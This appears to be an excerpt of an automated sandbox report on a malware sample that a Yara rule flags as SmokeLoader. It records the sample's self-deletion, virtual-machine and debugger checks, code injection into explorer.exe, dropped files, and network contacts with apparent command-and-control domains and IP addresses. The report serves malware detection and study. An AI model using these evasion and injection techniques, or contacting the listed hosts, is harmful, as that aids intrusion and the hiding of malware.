Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_00401880 push esi; iretd	11_2_00401893
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_2_00402E94 push es; iretd	11_2_00402EA0
Source: C:\Users\user\AppData\Roaming\eveggtb	Code function: 11_1_00402E94 push es; iretd	11_1_00402EA0

Source: UZ6FEqlix4.exe	Static PE information: section name: .pejevu
Source: UZ6FEqlix4.exe	Static PE information: section name: .dozi
Source: 411F.exe.5.dr	Static PE information: section name: .pejevu
Source: 411F.exe.5.dr	Static PE information: section name: .dozi
Source: eveggtb.5.dr	Static PE information: section name: .pejevu
Source: eveggtb.5.dr	Static PE information: section name: .dozi

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

Code function: 0_2_00433420 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00433420

Source: initial sample	Static PE information: section name: .text entropy: 6.87583252941
Source: initial sample	Static PE information: section name: .text entropy: 6.87583252941
Source: initial sample	Static PE information: section name: .text entropy: 6.87583252941

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\eveggtb

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\eveggtb			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\411F.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\uz6feqlix4.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\eveggtb:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: eveggtb, 0000000B.00000002.781404615.0000000001F80000.00000004.00000001.sdmp

Binary or memory string: ASWHOOKZ

Checks if the current machine is a virtual machine (disk enumeration)

Show sources

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Source: C:\Windows\explorer.exe TID: 6804	Thread sleep count: 602 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5408	Thread sleep count: 386 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5408	Thread sleep time: -38600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6648	Thread sleep count: 485 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6648	Thread sleep time: -48500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1576	Thread sleep count: 482 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6036	Thread sleep count: 398 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6036	Thread sleep time: -39800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6292	Thread sleep count: 279 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\411F.exe

Last function: Thread delayed

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 602	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 386	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 485	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 482	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 398	Jump to behavior

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,		0_2_0041CA09
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_0041AA72 TryEnterCriticalSection,BuildCommDCBAndTimeoutsA,GetNamedPipeHandleStateA,ReleaseMutex,AddAtomA,TzSpecificLocalTimeToSystemTime,SetConsoleCursorInfo,VerifyVersionInfoW,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,GetProcessPriorityBoost,FreeEnvironmentStringsA,VerifyVersionInfoA,FindFirstFileExA,		0_2_0041AA72

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

System information queried: ModuleInformation

Jump to behavior

Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.688084068.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.692263832.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.695671128.000000000FCE0000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}..
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAb
Source: explorer.exe, 00000005.00000000.693313522.000000000A897000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$
Source: explorer.exe, 00000005.00000000.687195483.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.726841267.000000000A783000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Show sources

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

Code function: 0_2_00424E60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00424E60

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

0_2_00433420

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

0_2_0041C7DF

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

Code function: 0_2_00845BDC push dword ptr fs:[00000030h]

0_2_00845BDC

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

Code function: 1_1_004027ED LdrLoadDll,

1_1_004027ED

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_00424E60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00424E60
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_0042C6D0 SetUnhandledExceptionFilter,	0_2_0042C6D0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: 0_2_004283B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004283B0

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: 411F.exe.5.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: unicupload.top
Source: C:\Windows\explorer.exe	Network Connect: 185.233.81.115 187	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe	Domain query: infinity-cheats.com
Source: C:\Windows\explorer.exe	Network Connect: 185.186.142.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe	Domain query: data-host-coin-8.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Thread created: C:\Windows\explorer.exe EIP: 4F41930			Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Thread created: unknown EIP: 4F91930			Jump to behavior

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb	Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe	Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe	Jump to behavior

Source: explorer.exe, 00000005.00000000.717104368.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.686588068.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.700174551.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.721547751.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.717509991.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.700728701.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.686741721.0000000001080000.00000002.00020000.sdmp, 411F.exe, 00000014.00000002.936067416.0000000000B80000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.692484311.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.711003387.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.726779211.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,	0_2_0041CA09
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,	0_2_00434C50
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00431810
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0042D890
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,	0_2_00434CA0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,InterlockedDecrement,	0_2_004245C0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry,	0_2_004315D0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: _strlen,EnumSystemLocalesA,	0_2_00431580
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00430E60
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement,	0_2_0042EB40
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00431360
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s,__invoke_watson_if_error,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0042C370
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,	0_2_00431710
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement,	0_2_0042EF20
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00430B20
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,__strnicmp,_strlen,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_strlen,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,	0_2_00430F20
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe	Code function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,	0_2_004313E0

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

0_2_0041C7DF

Source: C:\Users\user\Desktop\UZ6FEqlix4.exe

Code function: 0_2_0041CA09 __wremove,__wrename,SetCurrentDirectoryW,EnterCriticalSection,GlobalAddAtomW,UnlockFile,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeW,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitA,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,VirtualLock,GetSystemPowerStatus,SignalObjectAndWait,WaitForMultipleObjectsEx,OpenMutexA,GetLastError,HeapValidate,GetComputerNameW,OpenMutexW,FreeEnvironmentStringsA,TlsAlloc,ClearCommBreak,GetConsoleScreenBufferInfo,OpenSemaphoreA,FreeEnvironmentStringsA,GetWriteWatch,DeleteTimerQueueTimer,GetDevicePowerState,ProcessIdToSessionId,EnumSystemLocalesW,GetSystemTimeAdjustment,SetCommState,LocalShrink,WriteConsoleInputW,GetConsoleAliasExesLengthW,FreeConsole,SearchPathW,FlushConsoleInputBuffer,GetVolumePathNameA,GetConsoleCP,MoveFileExA,LockFileEx,ReplaceFileA,lstrcpyA,SetFileShortNameA,GetThreadLocale,CreateSemaphoreA,TryEnterCriticalSection,FreeEnvironmentStringsA,CreateSemaphoreA,SetLocalTime,FindResourceExA,GetQueuedCompletionStatus,CreateSemaphoreA,GetNumberFormatW,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExW,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructA,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,InterlockedIncrement,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceW,TryEnterCriticalSection,InterlockedExchange,SetFirmwareEnvironmentVariableA,CreateActCtxA,lstrcatW,WriteProfileStringA,TerminateThread,GetSystemWow64DirectoryA,GetConsoleMode,WriteFile,lstrcmpA,FindFirstFileA,DebugBreak,GetStringTypeA,

0_2_0041CA09

Stealing of Sensitive Information:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
